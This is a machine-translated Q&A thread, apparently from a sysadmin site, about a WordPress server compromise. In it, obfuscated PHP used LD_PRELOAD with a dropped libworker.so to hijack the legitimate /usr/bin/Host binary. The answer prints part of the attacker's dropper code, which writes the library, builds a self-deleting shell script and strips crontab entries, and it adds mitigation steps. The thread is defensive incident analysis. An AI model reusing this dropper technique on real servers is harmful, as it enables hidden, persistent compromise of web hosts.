web-dev-qa-db-ja.com

/ usr / bin / HostがハッキングされたPHPスクリプト

今日、Apache Webサーバーでの異常に高いリクエスト率と、非常に高い受信ネットワークトラフィックに気づきました。 Apacheのmod_statusページを確認したところ、問題のURLがパスwww.server.com/www/wp-includes/js/tinymce/plugins/wpautoresize/からのものであることがわかりました。そして確かに、ハッキングされた(難読化された)PHPスクリプトがいくつかあります。

Www-dataユーザーによって実行された奇妙なプロセスにも気づきました:

www-data  7300 10.8  0.1 2122900 18768 ?       Ssl  Jul11 121:47 /usr/bin/Host

/proc/7300/cmdlineを確認すると、これが確かに元の/usr/bin/Hostバイナリであることがわかりました。 netstat -anpは、多数のHTTP接続が開かれていることを示しているため、なんとかしてそのバイナリが悪用されています。 debsumsは、バイナリチェックサムに問題がないことを確認しました。プロセスがwww-dataユーザーの下で実行されたため、サーバー自体が侵害されたと信じる理由はありませんでした。

そのバイナリはどのように悪用されますか?

編集:これは「侵害されたサーバーに対処する方法」という幅広い質問ではありません。この特定のケースはそれがどのように機能するかについて非常に創造的であるため、1つの特定のタイプの乱用についての質問(およびすでに回答)ではなく、技術的にどのように行われますか。これは数年前から問題になっているようで(2012年の古いスレッドと質問)、今週私が遭遇しました。

8
Marki555

気分を害したPHPスクリプトとグーグル( このスレッド )のソースコードを掘り下げた後、私は説明を見つけました。

これは私が見つけたsystem.phpコードの一部です:

<?php
// ...
$n = file_put_contents("./libworker.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/Host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/Host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
// ...

/usr/bin/Hostがどのように関与しているかは、もう少し高度です。プログラムは、一部の機能にライブラリ(.soファイル)を使用します。ユーザーは、正当なバイナリを起動する前に、いくつかの.soファイルをプレリンク(LD_PRELOAD)して、動作を変更できます。

ご覧のとおり、このスクリプトはファイルlibworker.soを作成し、LD_PRELOAD環境変数を使用してそれをプリロードしているため、正当なHostバイナリはまったく異なる処理を行っています。

1.shシェルスクリプトを作成し、いくつかの方法で(直接、atコマンドを使用して、cronを使用して)実行しようとします。その後すぐに、スクリプトとライブラリファイルがディスクから削除されるため、通知されなくなります。

そもそも何が起こったかというと、脆弱なWordpressプラグインが悪用され、攻撃者がファイルをWordの書き込み可能なディレクトリに置くことができました。

緩和策とは、そのドメインの古いアクセスログファイルを分析し、異常な場所へのPOSTリクエストを見つけようとすることです。たとえば、WP/JoomlaプラグインのPHPファイルに直接アクセスすることは異常です。その後、削除してください。難読化されたすべてのPHP=ファイル、ディレクトリのアクセス許可を修正、実行中のHostプロセスを終了、ログファイルを再ハッキングの試みがないか監視します。

編集:私はESETから、この特定のライブラリと他のバージョンをすでに検出しているという情報を得ました。アンチウイルス会社はそれに名前Roopreを付け、それはMayhemボットネットの一部として使用されているようです。

Mayhemボットネットの詳細 analysis

詳細 analysis このエクスプロイトの。

10
Marki555